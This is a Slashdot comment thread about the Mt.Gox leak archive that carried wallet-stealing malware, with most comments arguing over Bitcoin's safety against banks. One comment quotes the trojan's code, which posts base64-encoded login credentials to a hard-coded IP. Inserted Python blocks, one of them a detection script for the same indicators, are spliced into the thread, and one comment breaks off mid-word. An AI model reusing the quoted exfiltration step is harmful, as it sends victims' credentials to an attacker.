      But Mt.Gox and Silk Road 2 and every other incident is immaterial when taken individually. As I said in my post, let's leave that aside for a minute and focus on the real issue. I have seen people tying themselves in knots to defend Bitcoin exactly-as-is when that energy would be far better spent acknowledging the weakness in the ecosystem and laying out clear plans to eradicate them. Your own reply speaks about the Mt.Gox fiasco as if losing 350M to incompetence is somehow better than losing it to a targeted attack. The longer people deny the existence of these problems with the existing ecosystem, the longer it will take for cryptocurrencies to find a firm footing in the world. Which I think is a shame.

      Finally, as for your "tinfoil hat" comment.... save the name-calling for the conspiracy theorists, of which I am not one. I have only said what many have said already, that Bitcoin is not yet ready for adoption by the masses. It currently, currently, lacks the necessary economic infrastructure to be used safely and effectively by the public. I don't know why that easily-supported statement bruises so many feelings.

    89. Re: Really? by conquistadorst · · Score: 2

      Bit coin is reliable. The shitty exchanges are not. If you have someone access to your paper wallet then the effect would be the same.

      Except nobody's paper wallet is connected to the internet, and few people carry significant hoards of cash in their wallet anyway so this isn't really a fantastic comparison. Yes, one could say, "well you can move it offgrid" then you can also do the same thing with your wallet and toss it in a safe or bank security box, only then would they become equals?

      That being said, your wallet is anything but a "safe" place but I'd still say a networked computer is worse. Bitcoins on a networked computer would probably be akin to someone leaving their cash in a safe, unattended, in an inconspicuous, publicly accessible place.

    90. Re:Really? by master_kaos · · Score: 1

      Um, actually there has been a problem with bitcoin itself with a forked chain causing double spend issues http://www.reddit.com/r/Bitcoi...

    91. Re:Really? by Anonymous Coward · · Score: 1

      Surely this must qualify for the Guinness Book of Records greatest accounting cluster fuck of all time.

      I think Enron retains the crown there.

    92. Re:Really? by hendrips · · Score: 1

      While you are absolutely correct that none of these types of losses are covered by FDIC insurance, they are all covered by some kind of insurance. Your own post mentions that losses from fraud and theft are covered by special private liability insurance. Treasury bonds are backed by the full faith and credit of the U.S. government. Insurance and annuities are almost always insured by the state that the bank is operating in, usually up to somewhere between $250k and $500k. So his point is still valid - pretty much any financial product* that you can get from a regulated bank is insured on your behalf by someone up to at least 250k.

      *Excluding of course products that are deliberately risky, such as if they offer a brokerage service to invest in the stock market.

    93. Re:Really? by IndustrialComplex · · Score: 1

      Yes. The 'how' is very important.

      If a plane suddenly crashes mid-flight, and I'm due to fly on that same model next week, I'd be concerned. If the crash was due to a fundamental flaw in the fuselage, I'm cancelling my flight. If it turns out the crash was due to the plane flying over rebel-held lands and being shot by a missile, my concern about my flight from Maryland to Vermont is greatly reduced.

      --
      Out of modpoints but really liked a post? 1BDkF6TtmmeZ3yqXbz9yhdYVqRYnwFoXDj
    94. Re:Really? by Anonymous Coward · · Score: 0

      BZZT Wrong! You don't have to keep your money stored on MT. Gox to sell it. How much did I lose? 00000000000000! Yes, it's more convenient for sure, but it's also far more dangerous.

    95. Re:Really? by Anonymous Coward · · Score: 0

      Way to whistle past the graveyard, there.

    96. Re:Really? by TheCarp · · Score: 1

      Yes, because real coins have never been stolen. If it ever happened we might need to invent a new term like....bank robbery or something.

      You are aware, I would hope, that the GP's point was that real banks use digital ledgers too, and in fact do not keep most of their money in "Real coin" at all. Not only that but, using whatever manner works to steal real coin, including by the use of malware to cause changes in digitally stored ledgers, is actually a way your precious real coin gets stolen now.

      There is even a big company that suffered some large thefts...maybe you heard of them Target? How about TJX?

      --
      "I opened my eyes, and everything went dark again"
    97. Re:Really? by InvalidError · · Score: 1

      Only if the merchant or whoever you concluded the transaction with agrees to reverse it and even then, the refund is still a separate transaction from the original payment.

      A crook can give you a "receipt" and vanish from your life or make excuses to refuse refunds just about as easily with real cash as Bitcoins.

      The main differences are that Bitcoin is mostly used in higher-risk transactions and does not have any legal protections anywhere so if you get screwed, you have little if any legal protection.

    98. Re:Really? by squiggleslash · · Score: 1

      Right, and when people say "Oh, that was a computer error" when a computer doesn't give them the answers they want, they're wrong too, it's actually something wrong with how the computer was programmed.

      Or, maybe, perhaps, just maybe, when people say "Bitcoin" they mean "The system associated with Bitcoin", which right now is intentionally unregulated, intentionally over-automated, intentionally unreversable, has not addressed banking because of ideological considerations despite widespread use of Bitcoin banks proving the concept is necessary, and so on.

      --
      You are not alone. This is not normal. None of this is normal.
    99. Re:Really? by Anonymous Coward · · Score: 0

      The problem isn't with bitcoin, the protocol. It's rock solid, every bit as good as cash. The problem is the lack of any infrastructure (legal institutions, insurance, etc.) on top of the protocol.

    100. Re:Really? by squiggleslash · · Score: 1

      And when you get to the space bitcoin is trying to compete in - international direct transfers, your "totally" becomes close to 0%.

      Oh, really? That's what Bitcoin's meant for? Well, couldn't that have been cleared up from the beginning! I honestly read a lot of Bitcoin's advocates as claiming that Bitcoin was intended to be some kind of decentralized universal currency intended for any transaction type, from tipping Redditors whose comments you like to buying Tesla cars. But if it's actually just intended for international direct transfers then its many flaws as a supposed universal currency are less of an issue I guess.

      --
      You are not alone. This is not normal. None of this is normal.
    101. Re:Really? by Ralph+Wiggam · · Score: 1

      But your fantasy of the vault all bitcoin is stored in being raided - that has never happened.

      6% of all of the bitcoins in existence got stolen a few weeks ago. It was merely the highest profile in a string of huge robberies.

    102. Re:Really? by codebonobo · · Score: 1

      lol...have you ever heard of FDIC? Consumer protections? None of these things apply to bitcoin and never will. My bank can be vaporized out of existence and it wouldn't do shit to me.

      Bitcoin Hot wallets can be insured if you want just like FDIC backed banks. Lloyds of London is one of the oldest and most trusted insurance companies in existence.

      https://www.elliptic.co/vault

      https://xapo.com/

    103. Re:Really? by Agent0013 · · Score: 1

      I'm not trying to say Bitcoin is the answer. It does appear to be the exchanges that are having problems and not the currency itself though.

      The real point I want to make is that FDIC insurance has a limit. So if a bank goes under and loses all the money of the people that have put their money into that bank, each account only gets back $250,000. So people who have millions of dollars in the bank will lose out just the same as people who left their Bitcoins in Mt Gox. And in the FDIC case it is all legal, so there is no hope (however slight) that law enforcement might try to get it back for you.

      --

      -- ssoorrrryy,, dduupplleexx sswwiittcchh oonn.. -Quote found on actual fortune cookie.
    104. Re:Really? by SinisterEVIL · · Score: 1

      The consensus between economists, politicians and scientists alike all agree that crypto currency is here to stay. Why do you disagree that bitcoin is not to be trusted?

    105. Re:Really? by Anonymous Coward · · Score: 0

      Well, except that none of the bitcoin "problems" or exploits have been with bitcoin itself. It's always some 3rd party poorly coded bullshit software (eg. exchanges, pools, online wallets, etc).

      So far no one has managed to exploit bitcoin itself.

      That's not even remotely true.

      The problem described in this summary is a piece of malware that looks for and steals Bitcoin wallets stored on the computer used to view data about MtGox's recent crash.

      The paper money equivalent would be if the newspaper by virtue of including an article on Bank of America managed to steal the paper bills you had stored under your mattress.

      This is a practical example of a way in which Bitcoin (and crypto-currency in general) is fundamentally less secure than "physical artifact" money. By virtue of existing only as data on a computer they are exposed to the wide range of common attacks used to copy data from a computer without the owner's knowledge or consent.

      The claims that "Bitcoin itself hasn't been compromised" are missing the point because they're equating counterfeiting money with stealing money. Sure no one has figured out how to counterfeit Bitcoin yet, but there have been rather a lot of successful thefts of Bitcoin.

    106. Re:Really? by QilessQi · · Score: 1

      Good point, which is why it's a good idea to diversify your assets among multiple banks and multiple account types at each bank (e.g., $250K in Savings, $250K in an IRA, etc.): in that manner you can have far more than $250K secured by FDIC. I'll wager that most Americans don't hit that $250K limit, and the ones who are way above it have other ways of securing their portfolio against disaster. For example, you can insure your retirement funds independently.

      Now consider, why was FDIC brought into existence back in the 1930s? Because of the stock market crash of '29 and the subsequent Great Depression. People learned the hard way that they couldn't just take their money out of the bank if the bank became insolvent. The FDIC was created by the US government to restore confidence in the banking system and encourage savings/investment again.

      As Wikipedia notes, "The FDIC also examines and supervises certain financial institutions for safety and soundness, performs certain consumer-protection functions, and manages banks in receiverships (failed banks)." And how does it do this? "Insured institutions are required to place signs at their place of business stating that "deposits are backed by the full faith and credit of the United States Government."

      I could be mistaken, but this form of oversight appears to be precisely where many Bitcoin enthusiasts don't want to go. They prefer to be free from government interference. Which is fine, if you like living in the Wild West. Most people didn't, which is why the Wild West was tamed. :-)

    107. Re:Really? by Anonymous Coward · · Score: 0

      SOME of those issues can't happen with bitcoin. You can't hold less money than people have given you and operate on the principle that not everyone is going to take everything out at once, because each coin is tracked. So there are benefits. There are also ways to regulate via the protocol that haven't been fully implemented yet, it's obvious that more work in this area needs to happen.

      Government regulation can't be counted on for a worldwide economy (hasn't that been proven enough at this point ?!)

      Everyone is freaking out about the bitcoin scams, and forgetting that it was the "regulated" industry scams that broke the world economy, and led to bitcoin being invented.

    108. Re:Really? by Ralph+Wiggam · · Score: 1

      Except Mt.Gox was never a bank,

      Yet somehow they possessed 6% of all the bitcoins in existence.

    109. Re:Really? by ras · · Score: 1

      6% of all of the bitcoins in existence got stolen a few weeks ago. It was merely the highest profile in a string of huge robberies.

      True. But what does that have to do with someone breaking into a bank vault? Mtgox isn't a bank. They are a broker - they buy and sell bitcoins. Some people gave them bitcoins to sell, but they lost (by double spending them) them instead.

      As I said elsewhere in this thread, here we have yet another example of someone who doesn't have a clue about what bitcoin is or how it operates, making a comment demonstrating his ignorance in spades and that comment modded to +5.

    110. Re:Really? by ttucker · · Score: 1

      Nobody has ever stolen my cash by making a copy of it. My cash has never been stolen from a computer hard drive. I agree, BitCoin is a bearer instrument like cash. That said, you must admit that there are striking differences, and that there is a clear and present risk involved with keeping something so easily, and irreversibly stolen, in a computer.

    111. Re:Really? by ttucker · · Score: 1

      This is a good point, some wire transfers are irreversible... it is exactly the purpose of the money mule scheme. To initiate a wire transfer, the customer interaction required at a bank is comparable to that which is required to withdraw cash. The secrets required to do this are much less frequently available in a computer to a hacker than say, a credit card number and CCV. If wire transfers were easy, there would be no need for a money mule.

      In the case of the money mule scam, the person who initiates the wire transfer is doing so intentionally, with the proper credentials. While they are defrauded, the wire transfer is entirely legitimate, and can not be reversed.

    112. Re:Really? by ttucker · · Score: 1

      While it is true that the transfers are not reversible on a whim, the bank is still liable to prove that the customer initiated the transaction, much the same as if someone appeared at the bank and withdrew cash.

    113. Re:Really? by ras · · Score: 1

      While it is true that the transfers are not reversible on a whim, the bank is still liable to prove that the customer initiated the transaction, much the same as if someone appeared at the bank and withdrew cash.

      Yes. But this is only because the banks can and do make mistakes, signatures can be forged and so on. One of the fundamentals bitcoin is built on is it never makes a mistake like that. Every addition to the block chain is checked by every miner, so if some random miner suffers a bit error in RAM, it will be rejected by the network. The whim part is taken care of by requiring the customer to sign the transaction using a digital signature. It can't be forged. Either the customer authorised the transaction, or they did the equivalent of giving away their banking password.

      And since bitcoin can't make mistakes like the ones you are alluding to, it can uphold the normal banking standards you describe and yet not need to do reversals.

    114. Re:Really? by Atzanteol · · Score: 1

      Which is what needs to be remembered in all of these bitcoin discussions. If I gave cash to "some guy" and he stole it nobody would be saying "well you just can't trust paper currency!" They'd be saying "why the fsck did you give your money to 'some guy'?"

      --
      "Ignorance more frequently begets confidence than does knowledge"

      - Charles Darwin
    115. Re:Really? by HornWumpus · · Score: 1

      Social Security Trust Fund!

      It's not even close.

      --
      John McAfee 'It was like that time I hired that Bangkok prostitute; to do my taxes, while I fucked my accountant'
    116. Re:Really? by Atzanteol · · Score: 1

      You're surprised people can be that stupid?

      --
      "Ignorance more frequently begets confidence than does knowledge"

      - Charles Darwin
    117. Re:Really? by HornWumpus · · Score: 1

      People who invested with Madoff knew he was a criminal. They just thought he was their criminal. Fuck them. Same as people who left bitcoin in MtGox.

      A fool and his money were lucky to get together in the first place.

      --
      John McAfee 'It was like that time I hired that Bangkok prostitute; to do my taxes, while I fucked my accountant'
    118. Re:Really? by mysidia · · Score: 1

      they are all covered by some kind of insurance.

      You are probably covered by a special policy with a private insurance company [* Although in the event of massive theft insurance company may be found insolvent, policy may not actually exist, or the situation may have voided coverage], is a HECK of a lot different than, Your deposit is guaranteed by the FDIC, backed up by the full faith and credit of the US government.

    119. Re:Really? by ras · · Score: 2

      I said that transaction malleability was exploited by hackers; it was.

      I thought I was pretty clear when I said it wasn't.

      The fact that the Bitcoin software no longer has this bug does not change the fact that it once did have this bug, and that this bug has been exploited.

      Again no, as far as I know it was never exploited. But I can see you prefer to believe an internet echo chamber confirming your world views over me, who is saying you are just plain wrong. More on the dangers of doing that later. For now I assume you really are willing to discard your tin foil hat if you understood what happened. Unfortunately that is going to require going into some detail.

      The transaction malleability problem we are discussing here is actually about how the transaction signature is represented. As I said, there are other causes of malleability, some of which haven't been fixed. The transaction signature is particularly important because the bitcoin protocol uses it to identify the transaction. When used in that manner the same piece of information is called a transaction id. Because it does uniquely identify a transaction once it is accepted into the block chain bitcoin exchanges sometimes use the transaction id to match for transactions they have generated.

      The different ways of representing a transaction id doesn't affect the core operators of bitcoin, so it was never regarded as serious. The reason it didn't affect bitcoin is two otherwise identical transactions with different transaction id's look like a double spend. Naturally the bitcoin protocol rejects all but the first attempt, so it doesn't matter how many different transaction id's you throw at it. Bitcoin is based on the premise that there is one and only one true and correct transaction history – and that is the block chain. You can throw any rubbish you like at it (and there have been many attempts at DDOS it by doing just that), but as far as bitcoin is concerned the only transactions that exist are the ones that get appended to the block chain. So if there are transactions with multiple id's, it is the id that gets into the block chain that is the official one. The rest never happened.

      So far I expect this matches your understanding of the root cause of the problem. It is about now we depart from that.

      The transaction signature / id is an ECDSA signature. Here is a real one: 770a723381d3edbcbfd06cecdd7b9f8569e9691d3a06a8a9c8972dd6fcbc8493 . It looks remarkably like a fixed length SHA checksum doesn't it? It's not. An ECDSA signature is two large numbers, which in bitcoin is encoded in DER format. DER format is used because, quoting from that Wikipedia link: “DER is a subset of BER providing for exactly one way to encode an ASN.1 value the shortest possible length encoding must be used”. Which sort of begs the question “how can it be malleable”? It isn't. But, the software the reference bitcoin software uses to produce and decode these signatures is openssl, and like all good internet software openssl follows Postel's Law: “Be liberal in what you accept, and conservative in what you send”. So OpenSSL always generates valid bitcoin signatures, but it accepts invalid ones, and in particular numbers with leading zeros. Whether you call this a bug or feature is more a matter of taste than anything else.

      This bug / feature was noticed by the bitcoin developers some 3 years ago. It wasn't viewed as serious. As I said, it doesn'
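
The strict-versus-liberal DER point in the comment above, as an added example that is not part of the original post or of any Bitcoin or OpenSSL code: a strict parser that rejects leading-zero padding, beside a lenient one that accepts it. The values `R` and `S` are constructed, the lenient mode is only a stand-in for a liberal decoder, and hashing the raw signature bytes stands in (as an assumption) for hashing the whole serialized transaction.

```python
import hashlib

def encode_int(n, extra_zeros=0):
    """DER INTEGER for non-negative n; extra_zeros > 0 builds a non-canonical test vector."""
    body = n.to_bytes((n.bit_length() + 7) // 8 or 1, "big")
    if body[0] & 0x80:
        body = b"\x00" + body          # sign byte required by DER
    body = b"\x00" * extra_zeros + body
    return bytes([0x02, len(body)]) + body

def encode_sig(r, s, extra_zeros=0):
    """SEQUENCE { INTEGER r, INTEGER s }; padding (if any) is applied to r only."""
    body = encode_int(r, extra_zeros) + encode_int(s)
    return bytes([0x30, len(body)]) + body

def _read_int(buf, pos, strict):
    if pos + 2 > len(buf) or buf[pos] != 0x02:
        raise ValueError("expected INTEGER tag")
    length = buf[pos + 1]
    if length == 0 or length >= 0x80:
        raise ValueError("bad INTEGER length")
    end = pos + 2 + length
    if end > len(buf):
        raise ValueError("INTEGER runs past end of signature")
    body = buf[pos + 2:end]
    if strict:
        if body[0] & 0x80:
            raise ValueError("negative INTEGER")
        if length > 1 and body[0] == 0 and not body[1] & 0x80:
            raise ValueError("non-minimal INTEGER (leading zero padding)")
    return int.from_bytes(body, "big"), end

def parse_sig(sig, strict=True):
    """Return (r, s); with strict=True only the single canonical encoding is accepted."""
    if len(sig) < 8 or sig[0] != 0x30:
        raise ValueError("expected SEQUENCE")
    if sig[1] >= 0x80 or sig[1] != len(sig) - 2:
        raise ValueError("bad SEQUENCE length")
    r, pos = _read_int(sig, 2, strict)
    s, pos = _read_int(sig, pos, strict)
    if pos != len(sig):
        raise ValueError("trailing bytes")
    return r, s

def accepts(sig, strict=True):
    try:
        parse_sig(sig, strict)
        return True
    except ValueError:
        return False

def digest(data):
    """Double SHA-256, the hash Bitcoin uses for identifiers."""
    return hashlib.sha256(hashlib.sha256(data).digest()).hexdigest()

# Constructed sample values, not a real signature.
R = int("11" * 32, 16)
S = int("22" * 32, 16)
CANONICAL = encode_sig(R, S)
PADDED = encode_sig(R, S, extra_zeros=1)   # same numbers, one extra zero byte

if __name__ == "__main__":
    for name, sig in (("canonical", CANONICAL), ("padded", PADDED)):
        print(name, "lenient:", accepts(sig, strict=False),
              "strict:", accepts(sig), digest(sig)[:16])
```

Both encodings decode to the same pair of numbers under the lenient parser, yet their hashes differ, which is why an implementation that keys its records on the hash needs the strict check.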

    120. Re:Really? by mysidia · · Score: 1

      Nobody has ever stolen my cash by making a copy of it.

      And nobody has ever stolen any of my bitcoins by picking my pocket.

      In fact... they couldn't. They'd need my security codes to unlock my private key. Just like they'd need my ATM PIN number to go steal cash out my bank account.

      there is a clear and present risk involved with keeping something so easily, and irreversibly stolen, in a computer.

      There is no requirement to keep your private key on a computer.

      You can have a large number of paper wallets with small amounts on each, and only go get it out of the vault and scan the key into your computer when needed to execute a transaction.

      There are also various hardening methods -- such as putting your coins in a form where two signatures will be required to unlock; using a verification script where your certain dedicated holding wallets have coins they can only spend to certain "staging" wallets and no other address.

      Using a signing procedure requiring two-factor authentication, with neither the computer, nor your portable device privy to the full private key, but both required to participate in signing, etc.

    121. Re: Really? by Anonymous Coward · · Score: 0

      You actually can't prove it's secure...
      It's based on cryptography, so you don't actually know it's as good as money.

    122. Re: Really? by Anonymous Coward · · Score: 0

      Sure they can hold less money than deposited. How the fuck do you suppose they profit from it? You think money sitting in a cupboard magically multiplies? Even normal banks don't do that.

    123. Re:Really? by david_thornley · · Score: 1

      Except that not every bitcoin transaction is made by the owner. There are exploits for that. It seems disingenuous to refer to bitcoin as not having mistakes when it is possible for some people to make fraudulent transactions.

      Ah, I see that "the equivalent of giving away their banking password" is rearing its head here. Note that doing that can consist of running a computer with a fully patched operating system, anti-malware protection, etc., if it's on line. Computer security is far from what it would need to be to make this practical.

      --
      "When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
    124. Re:Really? by ras · · Score: 1

      Except that not every bitcoin transaction is made by the owner.

      I am not sure what you mean. Every spend of your bitcoins has to be signed by your private key. It doesn't have to be submitted by you, but it must be authorised by you by that signature.

      Note that doing that can consist of running a computer with a fully patched operating system, anti-malware protection, etc., if it's on line.

      Hmmm. What do you think bitcoin is good for? Do you think it is the equivalent of storing your life's savings under a mattress, or doing transactions?

      You can use it to do either. The mattress scenario is easy enough. You just print your private keys out a few times on a piece of paper, and put them in safe deposit boxes. To put money under the mattress you just transfer funds to that key. You don't need access to the private key to do that. To get a large lump out of the mattress is appropriately more difficult and tedious. You disconnect the network, boot off a live CD, create the necessary transaction and put it on a USB key, reboot and send the transaction. It may be painful (although maybe not as painful as having to visit a bank), but it's safe from virus and hackers.

      However, the mattress isn't what bitcoin is meant to be good at. Its forte is doing transactions cheaply and quickly. A far more likely scenario is putting the amount of cash you would normally carry around in your wallet into your phone instead. Just like traditional cash, this is an amount of money you can afford to lose.

      Computer security is far from what it would need to be to make this practical.

      Actually, it isn't. True, traditional PCs aren't secure. But Android and iOS devices together with their TPMs are more than secure enough. They are so secure not even the FBI can crack an encrypted iPhone - they have to be sent back to Apple. Just like a wallet the risk comes more from losing the damned thing rather than it being cracked by a remote hacker. But unlike a real wallet, these devices can actively assist with security. They can demand PINs, or fingerprints. They can restrict how many bitcoins can be paid out to unknown keys in a day.

      However, the reality is that in the country I live in at least, direct transfers between banks are already so fast (read: seconds), and so cheap (read: free, between any bank in the country, regardless of who owns it or how far away it is) that bitcoin is going to have a hard time competing. I gather the US still uses cheques and bankers deliberately make dealing with competitors difficult. They may have created fertile ground for new weeds like bitcoin to grow in. When it comes to international transfers, where I wear all the risk and yet it still costs 10s of dollars to transfer money, things are definitely different. And surprise, surprise, it is in international transfers that bitcoin is seeing the most use right now.

    125. Re:Really? by mysidia · · Score: 1

      Bitcoin is not an insured bank, gone means gone with no legal recourse. Yes, skimmers exist. Credit card companies have far more protection against fraud.

      ATM cards don't. If someone steals from you over time, and you don't notice, within the next two statements, you are essentially out 100% of what was stolen.

      With Bitcoins, you can generate and print out say 50 paper wallets, put no more than $50 in any one wallet; lock up the secret keys in your safe; you can divide your funds any which way you want.

      Someone steals one... you are out a maximum of $50. That's also your potential liability in case of a stolen credit card.

    126. Re:Really? by Chas · · Score: 1

      And a ponzi scheme always needs an increasing amount of money to keep going (ie next year more $$ needs to go in than last year). That doesn't seem to be a feature of the Bitcoin ecosystem.

      Really? Currently you have a virtually generated currency system that hasn't reached its maximum number of coins generated.

      So yes, you have an increasing number of BTC coming into the system.

      You also have all these sucker^H^H^H^interested individuals helping to bloat the "value" of BTC in the short term.

      Plus sideline of space heater (BTC mining rig) sales.

      And remember that ponzi schemes always, eventually, crash. As they eventually run into a situation where people inevitably want to cash out faster than there is new money coming in.

      The same thing will (and it could be successfully argued, IS) happen here as well.

      --


      Chas - The one, the only.
      THANK GOD!!!
  2. This just gets better and better by VTBlue · · Score: 2

    This is becoming comical to the point of absurdity.

    1. Re:This just gets better and better by Anonymous Coward · · Score: 0

      This is a lolcow that will never run dry.

  3. Slowpoking hard, aren't we? by gustgr · · Score: 3, Insightful

    This was known minutes after the leak was released. You disappoint me, slashdot.

    1. Re:Slowpoking hard, aren't we? by gustgr · · Score: 1

      Also, the MtGox2014Leak.zip file is 750672322 bytes. The trades.zip file is 622555932 bytes.

    2. Re:Slowpoking hard, aren't we? by Anonymous Coward · · Score: 0

      Sorry, this news story would have made it to the front page faster if it would have involved Tesla Motors or Google Glass.
       
      -The Slashdot Team

  4. Leak by gustgr · · Score: 5, Informative

    The leak is real, nonetheless. I found my balance and transactions there.

    1. Re:Leak by WinstonWolfIT · · Score: 2

      The data is publicly available.

    2. Re:Leak by Kjella · · Score: 2

      Of course, just like repacked cracks usually do provide you with working software - and a trojan/malware infection. Why would you want to fight negative comments and complaints that it's fake when you can deliver and turn your victims into willing advocates and distributors?

      --
      Live today, because you never know what tomorrow brings
    3. Re:Leak by gustgr · · Score: 1

      The thing is, you don't need that .exe to access the leaked data. The leaks are just a bunch of csv files. I never run the .exe.

  5. Old news. by Janek+Kozicki · · Score: 3, Informative

    Coindesk already wrote about that almost two weeks ago!

    --
    #
    #\ @ ? Colonize Mars
    #
    1. Re:Old news. by rmdingler · · Score: 2
      We're like the Supreme Court here, Janek.

      If you make your way successfully through district and appeals, we might be willing to hear and comment on your case.

      --
      Happiness in intelligent people is the rarest thing I know.

      Ernest Hemingway

    2. Re:Old news. by Anonymous Coward · · Score: 0

      Old news indeed. Mr. Sergey Lozhkin should have checked reddit...

    3. Re:Old news. by guacamole · · Score: 1

      Yeah, but slashdot is not coindesk. I still appreciate this gets posted on /.

  6. Censored content revealed by boulat · · Score: 1

    Looks like someone posted code that shows the censored IP http://pastebin.com/w2EWMp35

    1. Re:Censored content revealed by mythosaz · · Score: 2

      I'm mostly amused by the User-Agent:


            set the httpHeaders to "User-Agent: MtGoxBackOffice v0.1.2"
            libURLSetSSLVerification false
            post base64Encode("action=login&user="&field "l"&"&pass="&keyBuff&return) to "http://82.118.242.145/admin/tibanne-admin.php"
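
A defender's use of the three lines quoted above, as an added example that is not part of the original comment or of the pasted code: a small hunt over web-proxy records for the User-Agent, host, path and base64-encoded login body that the snippet shows. The log format, the sample lines and the function names are constructed for illustration.

```python
import base64
import binascii
import shlex
from urllib.parse import urlsplit

# Indicators taken from the snippet quoted in the comment above.
UA_MARKER = "MtGoxBackOffice"
C2_HOST = "82.118.242.145"
C2_PATH = "/admin/tibanne-admin.php"
BODY_PREFIX = b"action=login&user="

def body_matches(b64_body):
    """True if the POST body is valid base64 that decodes to the login form."""
    try:
        decoded = base64.b64decode(b64_body, validate=True)
    except (binascii.Error, ValueError):
        return False
    return decoded.startswith(BODY_PREFIX)

def indicators(line):
    """Return the indicators one log line matches.

    Assumed (constructed) format: ts src method url "user-agent" body_b64_or_-
    """
    ts, src, method, url, agent, body = shlex.split(line)
    parts = urlsplit(url)
    hits = []
    if UA_MARKER in agent:
        hits.append("user-agent")
    if parts.hostname == C2_HOST:
        hits.append("host")
    if parts.path == C2_PATH:
        hits.append("path")
    # Weak on its own (the form is generic), but it survives a changed User-Agent.
    if method == "POST" and body != "-" and body_matches(body):
        hits.append("body")
    return hits

def hunt(lines):
    """Map source address -> matched indicators, for lines with at least one hit."""
    found = {}
    for line in lines:
        hits = indicators(line)
        if hits:
            found.setdefault(line.split()[1], []).extend(hits)
    return found

# Constructed sample records; the credentials are placeholders.
SAMPLE_BODY = base64.b64encode(b"action=login&user=alice&pass=CONSTRUCTED\n").decode()
LOG = [
    f'2014-03-14T10:00:01Z 10.0.0.5 POST http://{C2_HOST}{C2_PATH} '
    f'"MtGoxBackOffice v0.1.2" {SAMPLE_BODY}',
    '2014-03-14T10:00:02Z 10.0.0.6 GET http://example.com/index.html "Mozilla/5.0" -',
    f'2014-03-14T10:00:03Z 10.0.0.7 POST http://example.net/submit "curl/7.35.0" {SAMPLE_BODY}',
]

if __name__ == "__main__":
    for src, hits in hunt(LOG).items():
        print(src, hits)
```

A source that matches all four indicators is a host to isolate and check for wallet-file access; a body-only match needs review before acting on it.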

    2. Re:Censored content revealed by Anonymous Coward · · Score: 0

      Anyone know what language that code is?

    3. Re:Censored content revealed by Anonymous Coward · · Score: 0

      LiveCode. From the week old reddit thread linked elsewhere on this page:

      Nope. I read source code directly from memory. LiveCode stores this encrypted and compressed in the executable. So I traced it until it was unencrypted and uncompressed and then simply copied and pasted.

  7. Ultimately, Bitcoin was... by Anonymous Coward · · Score: 0

    ...a government plot to concentrate dark money into preferred hands.

  8. Re: Really??? by rmdingler · · Score: 2
    Mt Gox, the top exchange for turning bitcoins into coin of the realm,

    turned out to be a house of phosphorous cards,

    and you don't see a red flag waving?

    Was your retirement locked up in there and now you find yourself too poor to pay attention?

    --
    Happiness in intelligent people is the rarest thing I know.

    Ernest Hemingway

  9. Tattoo spots the LOST MISSING SKYHACKED plane by Anonymous Coward · · Score: 0

    And he says,
    Da plane!
    Da plane!

  10. No Linux version by Anonymous Coward · · Score: 0

    You can keep trying to suggest Linux is sufficiently mainstream by now, but if even the ultimate in geekness, an exchange for Bitcoins, didn't bother developing a Linux version of the malware for stealing bitcoins, then you know that Linux is not even given credit by the geek community. Stop wasting your life trying to convert to Linux and go back to Windows; at least you know it has a future.

  11. no web depository or vault is safe as long as its by Anonymous Coward · · Score: 0

    no web depository or vault is safe as long as it's up to one gatekeeper to allow withdrawals - mt gox has historically been very slow to allow withdrawals - one year ago and more, many many complaints from mt gox members regarding inability to withdraw funds - karpeles always had excuses even back then and that is bitcoin's fatal flaw.

  12. Not from the customer's point of view by Camael · · Score: 3, Insightful

    ...except this was no different from someone doing the same thing to a bank. Your arguement is invalid

    Except that the current banking system has failsafes to protect the depositor, even if the bank is at risk. For those who still use it, bank books and pass books record how much is in your bank account. Ditto for the monthly statements sent to depositors who have an electronic account, which is a hard copy in your hand. In many jurisdictions, these are legal evidence of a debt owed by the bank to you. Most banks are insured, both privately and by their respective governments.

    If you are just a normal depositor stashing your cash in a bank account, you are much more likely to recover something in the event a bank is (electronically) robbed. Take for example the relatively recent collapse of Barings Bank - according to the Bank Of England Report on the Collapse of Barings, the interests of depositors and creditors were still protected although the bank was closed. Compare this with the uncertain fate of the Bitcoin depositors of Mt. Gox which just recently filed for bankruptcy.

    The truth is that depositing funds in Bitcoins right now involves taking a substantial risk which is much higher than putting it into the current banking system. Deluding uninformed investors that investing in Bitcoins is "no different" from putting it in a bank is untrue and is likely to greatly harm the Bitcoin cause once these investors are burnt.

    1. Re:Not from the customer's point of view by RogWilco · · Score: 1

      But that isn't an inherent attribute of the currency, that's an attribute of the US banking system. Simply storing your money in USD does not offer any such failsafes. If I store my USD cash in an insecure manner (on the dresser in a shitty hotel with underpaid employees), the FDIC is not going to reimburse me when it gets stolen because they were US dollars. Why can the same not be said for Bitcoin? Just like having USD in cash, it's not the currency that is the problem, it's the method of storing it. Perhaps Bitcoin doesn't yet have the same robust infrastructure and collection of institutions built around it like most first-world currencies, but that is not because of some inherent flaw with Bitcoin, that's because of its relatively young age as a currency.

  13. This kind of thing is why I got rid of my Bitcoins by Bryan+Ischo · · Score: 1

    Almost every aspect of Bitcoin is just seeping with get rich quick scammers, schemers, and thieves and just general disgusting lowlifes. Whatever money I might have made by holding onto my bitcoins, it was worth losing just to get out of Bitcoin and not have to associate myself with that den of scum and villainy anymore.

  14. Re:This kind of thing is why I got rid of my Bitco by Anonymous Coward · · Score: 0

    Ah, so you've finally become a Buddhist and renounced all material possessions and currencies.

  15. Re:This kind of thing is why I got rid of my Bitco by Neo-Rio-101 · · Score: 1

    You'll find the same with the forex market and other dodgy investment schemes.

    Trading and investing is basically a game of "who is the better legal scammer".
    At its core, it's a game with its own rules and dirty (but legal) tricks and unsportsmanlike behavior.

    --
    READY.
    PRINT ""+-0
  16. Different forms, same effect by Camael · · Score: 2

    There is zero counterfeit bitcoin. You can't say the same about paper currency.

    Technically correct, since bitcoin does not exist in physical form and therefore cannot be counterfeited in physical form.

    But can transactions involving bitcoins be counterfeited? Most certainly!

    Mt. Gox, Bitstamp, and other Bitcoin exchanges have temporarily suspended withdrawal transactions after coming under a form of a denial-of-service attack that abuses weaknesses in the way they keep track of fund balances, a security expert said.

    Andreas M. Antonopoulos, chief security officer of digital wallet developer Blockchain, said the attacks work by flooding exchanges with a large number of malformed transactions that are similar, but not identical, to legitimate transactions that were already made. Exchanges that trust one or more of the fake records instead of the entries in the official Bitcoin blockchain quickly fall out of sync with the rest of the network and must recalculate their fund balances once the mistakes become apparent.

    The net effect is the same. Counterfeit paper currency deprives its holders of the value of that currency. Counterfeit bitcoin transactions deprive the owners of the bitcoins involved in that transaction of the value of those bitcoins.

